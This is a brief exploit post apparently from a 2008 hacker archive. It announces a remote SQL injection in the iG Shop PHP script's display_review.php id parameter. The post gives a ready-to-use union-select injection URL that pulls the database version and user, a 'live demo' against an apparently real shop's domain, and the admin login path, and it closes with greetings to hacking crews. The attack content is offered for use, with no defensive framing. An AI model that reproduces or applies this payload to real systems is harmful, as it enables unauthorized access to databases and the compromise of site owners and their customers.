|___________________________________________________| | | iG Shop (display_review.php id) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.CoM | www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script : http://php.arsivimiz.com/Kategoriler/php/alisveris/?P=2&K=&T= | | DorK : :-P |___________________________________________________| Exploit: ________ www.[target].com/Script/display_review.php?id=-1+union+select+1,2,3,VERSION(),2008,USER()+users-- L!VE DEMO: _________ http://shop.igeneric.co.uk/shop/display_review.php?id=-1+union+select+1,2,3,VERSION(),2008,USER()+users-- ____________ Admin Login : www.[target].com/Script/admin ____________ ____________________________( Greetz )____________________________ | | Hussin-X.CoM | TrYaG.cc | MiLw0rM.com | | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |jiko | CraCkEr | Iraqihack | | | FAHD | mos_chori | str0ke | |_________________________________________________________________ Im IRAQi 2008-08-27 WwW.Hussin-X.cOm